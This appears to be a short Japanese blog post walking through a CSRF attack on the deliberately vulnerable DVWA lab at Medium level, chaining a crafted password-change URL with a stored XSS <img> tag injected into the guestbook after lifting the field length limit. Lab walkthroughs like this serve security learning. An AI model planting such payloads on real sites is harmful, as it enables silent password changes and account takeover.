Shikata Ga Nai

Private? There is no such things.

DVWAでCSRF(Medium)

Hey guys!

セキュリティレベルを『Medium』に変更。

新しいパスワードを『123』に変更。

 

f:id:ThisIsOne:20191108163944p:plain

 

表示されているURLのlocalhost以降をコピーしてパスワード部分の
『123』→『000』に書き換えたものを用意して。

/vulnerabilities/csrf/?password_new=000&password_conf=000&Change=Change#

 

次に『XSS Stored』メニューに移動して。

Nameの入力エリアの最大数を100に変更。

 

f:id:ThisIsOne:20191108164459p:plain

 

Nameの入力エリアに下記のhtmlコードを入力し、Messageエリアは適当に。

<img src="/vulnerabilities/csrf/?password_new=000&password_conf=000&Change=Change#">

最後に『Sign Guestbook』ボタンで実行。

 

f:id:ThisIsOne:20191108164747p:plain

 

ログアウトして、パスワードの入力エリアのtypeをパスワードが見えるようにtextへ変更。

パスワードが『000』でログインできることを確認。

 

f:id:ThisIsOne:20191108164930p:plain

 

ちなみに

<img src="http://localhost/vulnerabilities/csrf/?password_new=000&password_conf=000&Change=Change#">

でも問題ない。

 

Best regards,